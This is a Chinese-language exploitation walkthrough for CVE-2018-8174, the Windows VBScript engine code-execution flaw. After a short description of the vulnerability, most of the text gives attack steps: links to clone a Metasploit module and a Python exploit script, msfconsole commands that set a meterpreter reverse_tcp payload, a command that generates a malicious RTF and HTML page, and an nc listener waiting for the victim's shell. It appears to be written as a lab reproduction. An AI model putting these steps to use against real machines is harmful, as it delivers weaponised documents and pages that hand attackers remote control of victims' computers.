漏洞描述
CVE-2018-8174是 Windows VBScript Engine 代码执行漏洞。由于VBScript脚本执行引擎(vbscript.dll)存在代码执行漏洞,攻击者可以将恶意的VBScript嵌入到Office文件或者网站中,一旦用户不小心点击,远程攻击者可以获取当前用户权限执行脚本中的恶意代码,该漏洞影响最新版本的IE浏览器及使用了IE内核的应用程序。用户在浏览网页或打开Office文档时都可能中招,最终被黑客植入后门木马完全控制电脑。微软在4月20日早上确认此漏洞,并于5月8号发布了官方安全补丁,对该0day漏洞进行了修复,将其命名为CVE-2018-8174。
漏洞编号
CVE-2018-8174
漏洞利用
MSF模块
下载地址:git clone https://github.com/0x09AL/CVE-2018-8174-msf.git
使用方法:
1. 复制CVE-2018-8174.rb 到 /usr/share/metasploit-framework/modules/exploits/windows/fileformat/
2. 复制CVE-2018-8174.rtf 到 /usr/share/metasploit-framework/data/exploits/
3. 启动msfconsole
use exploit/windows/fileformat/CVE-2018-8174
set PAYLOAD windows/meterpreter/reverse_tcp
set srvhost 192.168.107.128
set lhost 192.168.107.128
exploit
exploit之后,msf会在/root/.msf4/local/目录下生成一个msf.rtf文档,仅支持Microsoft Office 32位;且开启一个8080端口的Web服务,根目录会自动生成index.html页面,仅支持IE浏览器32位,msf.rtf文档和index.html都内含有恶意的VBScript代码。
Office恶意文档测试,发现不能弹回shell。
测试Web服务恶意index.html页面(须使用IE 32位来进行测试),发现也是不能够弹回shell。
1. 使用msf模块没有复现成功,而且CVE-2018-8174-msf模块的作者也说了,模块使用当中可能遇到各种问题,鄙人在复现的时候发现也不能弹回shell,但是msf回显”CVE-2018-8174 – Delivering Exploit”基本可以判定漏洞是存在的。
2. 所以下面我使用exp脚本手工去做复现。
Exp脚本
下载地址:git clone https://github.com/iBearcat/CVE-2018-8174_EXP.git
使用方法:
1. python CVE-2018-8174.py -u http://192.168.1.108/exploit.html -o exp.rtf -i 192.168.1.100 -p 6666
2. 把exploit放在Web服务器上
3. Nc监听6666端口(192.168.1.100)
4. 靶机使用IE 32位访问http://192.168.1.108/exploit.html
分析文章
[0] http://www.4hou.com/vulnerable/11441.html
[1] https://www.anquanke.com/post/id/117790